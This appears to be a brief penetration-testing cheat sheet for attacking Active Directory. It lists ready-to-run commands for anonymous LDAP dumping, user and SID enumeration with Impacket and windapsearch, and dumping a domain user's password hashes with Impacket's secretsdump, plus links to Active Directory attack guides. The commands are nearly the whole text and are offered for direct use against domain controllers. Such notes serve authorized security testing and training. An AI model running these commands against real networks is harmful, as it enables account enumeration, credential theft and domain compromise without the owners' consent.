Note: Be careful with brute forcing AD as you can disable user accounts due to the Account Lockout Policy.
Anonymous Credential LDAP Dumping:
- ldapsearch -LLL -x -H ldap:// -b ‘’ -s base ‘(objectclass=*)’
Impacket GetADUsers.py (Must have valid credentials)
- GetADUsers.py -all <domain\User> -dc-ip <DC_IP>
Impacket lookupsid.py:
- /usr/share/doc/python3-impacket/examples/lookupsid.py username:password@172.21.0.0
Impacket Secretdump:
python3 secretdump.py 'breakme.local/Administrator@172.21.0.0' -just-dc-user anakin
Windapsearch:
https://github.com/ropnop/windapsearch
- python3 windapsearch.py -d host.domain -u domain\ldapbind -p PASSWORD -U
-
PayloadAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#most-common-paths-to-ad-compromise
-
Attacking Active Directory: 0 to 0.9: https://zer1t0.gitlab.io/posts/attacking_ad/